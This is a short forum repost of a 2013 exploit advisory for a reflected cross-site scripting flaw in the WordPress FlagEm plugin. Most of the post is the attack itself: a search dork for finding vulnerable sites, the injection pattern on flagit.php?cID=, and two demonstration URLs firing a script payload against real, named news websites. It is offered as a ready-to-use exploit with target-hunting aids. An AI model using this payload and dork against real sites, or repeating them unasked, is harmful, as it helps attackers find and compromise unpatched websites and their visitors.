Byte-ul Posted July 24, 2013 Report Share Posted July 24, 2013 The WordPress FlagEm plugin suffers from a cross site scripting vulnerability.Authored by IeDbSource: WordPress FlagEm Cross Site Scripting ? Packet Storm################################## Iranian Exploit DataBase# http://iedb.ir################################## Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities# Author : Iranian Exploit DataBase# Discovered By : IeDb# Email : IeDb.Team@Gmail.com# Home : http://iedb.ir# Software Link : http://wordpress.org/# Security Risk : High# Tested on : Linux# Dork : inurl:/plugins/FlagEm/################################## Exploit :# [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]# Dem0 :# http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script># http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>################################## Exploit Archive = http://www.iedb.ir/exploits-269.html################################# Quote Link to comment Share on other sites More sharing options...
